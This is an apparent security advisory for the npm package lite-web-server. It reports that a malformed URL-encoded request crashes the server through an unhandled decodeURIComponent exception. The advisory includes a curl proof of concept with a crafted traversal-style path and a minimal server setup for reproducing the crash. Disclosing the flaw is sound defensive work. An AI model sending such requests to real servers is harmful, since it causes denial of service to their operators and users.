lite-web-server
is an HTTP file server, and describes itself as The npm package to create simple web server
.
Observation:
- Virtually zero downloads, so no considerable impact.
- It was last published 6 months ago, so can assume some level of maintenance exists.
Resources:
- Project's GitHub source code: https://github.com/chasyumen/lite-web-server
- Project's npm package: https://www.npmjs.com/package/lite-web-server
If an attacker makes an HTTP request to a server running with lite-web-server
and includes control characters that the decodeURI() function is unable to parse,
then it causes lite-web-server
to crash.
The vulnerable code is line 274 of src/WebServer.js
which doesn't handle an
exception thrown here:
var _url = decodeURIComponent(req.url).slice(1);
- Install the package:
npm install --save lite-web-server@1.2.2
- Create a
server.js
to serve requests (see below) - Ensure you have a
./public
directory in the current project and have a file in there - Send an HTTP request which uses unicode characters outside of the ASCII scope of URLs:
curl http://10.100.102.7:3000/..%c0%2fetc%c0%2fhosts
- Observe the server crashes
server.js
var { WebServer } = require("lite-web-server");
var server = new WebServer({
dir: "./public/"
});
server.start();
Liran Tal